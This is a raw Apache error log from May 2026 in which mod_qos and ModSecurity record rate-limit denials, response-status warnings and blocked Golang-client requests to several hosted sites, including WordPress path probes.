[Tue May 26 20:00:28.233223 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswD6gAAAFU
[Tue May 26 20:00:28.235293 2026] [qos:error] [pid 106517:tid 106689] [client 45.148.10.120:57980] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gYwAAAKs
[Tue May 26 20:00:28.236603 2026] [qos:error] [pid 106517:tid 106710] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gZAAAAMA
[Tue May 26 20:00:28.238911 2026] [qos:error] [pid 106517:tid 106685] [client 45.148.10.120:46692] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gZQAAAKc
[Tue May 26 20:00:28.278936 2026] [security2:error] [pid 106517:tid 106688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f8wAAAKo"]
[Tue May 26 20:00:28.279581 2026] [security2:error] [pid 106517:tid 106657] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f3wAAAIw"]
[Tue May 26 20:00:28.301576 2026] [security2:error] [pid 106517:tid 106769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f9AAAAPs"]
[Tue May 26 20:00:28.305005 2026] [security2:error] [pid 106517:tid 106764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f4QAAAPY"]
[Tue May 26 20:00:28.306582 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f4wAAAKY"]
[Tue May 26 20:00:28.309730 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f5AAAAKM"]
[Tue May 26 20:00:28.318253 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f5QAAAPQ"]
[Tue May 26 20:00:28.326755 2026] [security2:error] [pid 106517:tid 106759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f_gAAAPE"]
[Tue May 26 20:00:28.327678 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f-QAAALQ"]
[Tue May 26 20:00:28.332978 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1f9gAAAJA"]
[Tue May 26 20:00:28.336371 2026] [security2:error] [pid 93576:tid 93783] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugmDRMqfxdEDkoswDVwAAAEc"]
[Tue May 26 20:00:28.352099 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugmDRMqfxdEDkoswDVQAAAEk"]
[Tue May 26 20:00:28.361669 2026] [security2:error] [pid 93576:tid 93723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugmDRMqfxdEDkoswDXQAAAAs"]
[Tue May 26 20:00:28.365774 2026] [security2:error] [pid 93576:tid 93754] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDoAAAACo"]
[Tue May 26 20:00:28.368241 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugmDRMqfxdEDkoswDaQAAAGU"]
[Tue May 26 20:00:28.377947 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gMwAAALc"]
[Tue May 26 20:00:28.382199 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1gCQAAAKE"]
[Tue May 26 20:00:28.382979 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugmDRMqfxdEDkoswDWQAAAAw"]
[Tue May 26 20:00:28.388371 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDkAAAADM"]
[Tue May 26 20:00:28.388492 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gNAAAAMk"]
[Tue May 26 20:00:28.390366 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDnQAAABI"]
[Tue May 26 20:00:28.405906 2026] [security2:error] [pid 93576:tid 93759] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDogAAAC8"]
[Tue May 26 20:00:28.418759 2026] [security2:error] [pid 93576:tid 93750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDnAAAACY"]
[Tue May 26 20:00:28.422719 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDpQAAABc"]
[Tue May 26 20:00:28.422861 2026] [security2:error] [pid 93576:tid 93821] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDvAAAAG0"]
[Tue May 26 20:00:28.423873 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWugoZZc2DoU1lPnP1gCwAAANc"]
[Tue May 26 20:00:28.424263 2026] [security2:error] [pid 93576:tid 93720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDnwAAAAg"]
[Tue May 26 20:00:28.433583 2026] [security2:error] [pid 93576:tid 93756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDowAAACw"]
[Tue May 26 20:00:28.437868 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDpgAAAFI"]
[Tue May 26 20:00:28.464294 2026] [security2:error] [pid 106517:tid 106742] [client 103.163.220.43:20237] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/2024/"] [unique_id "ahWuhIZZc2DoU1lPnP1giwAAAOA"]
[Tue May 26 20:00:28.486917 2026] [security2:error] [pid 93576:tid 93753] [client 45.86.0.22:42489] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWug2DRMqfxdEDkoswDyQAAACk"], referer: https://anujtradingco.com
[Tue May 26 20:00:28.550371 2026] [security2:error] [pid 106517:tid 106703] [client 91.142.73.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuhIZZc2DoU1lPnP1gjwAAALk"], referer: http://anujtradingco.com/pages/about-wide/
[Tue May 26 20:00:28.551472 2026] [qos:error] [pid 106517:tid 106754] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuhIZZc2DoU1lPnP1gsAAAAOw
[Tue May 26 20:00:28.553411 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEGQAAABE
[Tue May 26 20:00:28.560188 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEGgAAAGk
[Tue May 26 20:00:28.568663 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEGwAAABM
[Tue May 26 20:00:28.587099 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEHAAAAGM
[Tue May 26 20:00:28.591098 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEHQAAAHs
[Tue May 26 20:00:28.593124 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gsgAAAL0
[Tue May 26 20:00:28.593551 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEHgAAAAc
[Tue May 26 20:00:28.594237 2026] [qos:error] [pid 106517:tid 106778] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gswAAAQQ
[Tue May 26 20:00:28.594248 2026] [qos:error] [pid 106517:tid 106671] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gtAAAAJo
[Tue May 26 20:00:28.715712 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEIAAAAAg
[Tue May 26 20:00:28.717602 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEIQAAACw
[Tue May 26 20:00:28.735743 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEIgAAADI
[Tue May 26 20:00:28.745879 2026] [qos:error] [pid 106517:tid 106716] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gugAAAMY
[Tue May 26 20:00:28.747566 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEJAAAAFM
[Tue May 26 20:00:28.747670 2026] [qos:error] [pid 106517:tid 106658] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gvAAAAI0
[Tue May 26 20:00:28.747749 2026] [qos:error] [pid 106517:tid 106733] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1guwAAANc
[Tue May 26 20:00:28.748316 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEIwAAAFA
[Tue May 26 20:00:28.748935 2026] [qos:error] [pid 93576:tid 93726] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEJQAAAA4
[Tue May 26 20:00:28.749976 2026] [qos:error] [pid 106517:tid 106749] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gvQAAAOc
[Tue May 26 20:00:28.891634 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEKAAAAEE
[Tue May 26 20:00:28.892681 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEKQAAACo
[Tue May 26 20:00:28.895643 2026] [qos:error] [pid 106517:tid 106764] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gyAAAAPY
[Tue May 26 20:00:28.897781 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEKgAAACk
[Tue May 26 20:00:28.899244 2026] [qos:error] [pid 106517:tid 106723] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gyQAAAM0
[Tue May 26 20:00:28.901199 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswEKwAAAAo
[Tue May 26 20:00:28.901209 2026] [qos:error] [pid 106517:tid 106654] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gywAAAIk
[Tue May 26 20:00:28.903193 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhGDRMqfxdEDkoswELAAAAFo
[Tue May 26 20:00:28.905258 2026] [qos:error] [pid 106517:tid 106703] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhIZZc2DoU1lPnP1gzQAAALk
[Tue May 26 20:00:28.964234 2026] [security2:error] [pid 93576:tid 93759] [client 103.163.220.40:50677] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/admin.php"] [unique_id "ahWuhGDRMqfxdEDkoswEMAAAAC8"]
[Tue May 26 20:00:29.039858 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEMgAAAAc
[Tue May 26 20:00:29.043127 2026] [qos:error] [pid 106517:tid 106760] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1g0wAAAPI
[Tue May 26 20:00:29.045973 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEMwAAAAQ
[Tue May 26 20:00:29.050768 2026] [qos:error] [pid 106517:tid 106737] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1g1wAAANs
[Tue May 26 20:00:29.052414 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswENAAAAEA
[Tue May 26 20:00:29.056414 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswENgAAAG0
[Tue May 26 20:00:29.056924 2026] [qos:error] [pid 106517:tid 106696] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1g2AAAALI
[Tue May 26 20:00:29.060093 2026] [qos:error] [pid 106517:tid 106651] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1g2QAAAIY
[Tue May 26 20:00:29.189416 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswENwAAACw
[Tue May 26 20:00:29.195014 2026] [qos:error] [pid 106517:tid 106755] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1g3QAAAO0
[Tue May 26 20:00:29.202286 2026] [qos:error] [pid 106517:tid 106670] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1g3gAAAJk
[Tue May 26 20:00:29.205215 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEOAAAAGo
[Tue May 26 20:00:29.205373 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:53530] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEOQAAABo
[Tue May 26 20:00:29.205988 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEOgAAAEk
[Tue May 26 20:00:29.210260 2026] [qos:error] [pid 106517:tid 106716] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1g3wAAAMY
[Tue May 26 20:00:29.211003 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhWDRMqfxdEDkoswEOwAAACU
[Tue May 26 20:00:29.221105 2026] [qos:error] [pid 106517:tid 106658] [client 45.148.10.120:53528] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuhYZZc2DoU1lPnP1g4AAAAI0
[Tue May 26 20:00:29.279352 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDpAAAABw"]
[Tue May 26 20:00:29.285277 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDsgAAAAA"]
[Tue May 26 20:00:29.291391 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDywAAAGY"]
[Tue May 26 20:00:29.293224 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug2DRMqfxdEDkoswDtwAAAHg"]
[Tue May 26 20:00:29.295902 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gQQAAANo"]
[Tue May 26 20:00:29.295910 2026] [security2:error] [pid 106517:tid 106732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gQgAAANY"]
[Tue May 26 20:00:29.309034 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWug4ZZc2DoU1lPnP1gQwAAANQ"]
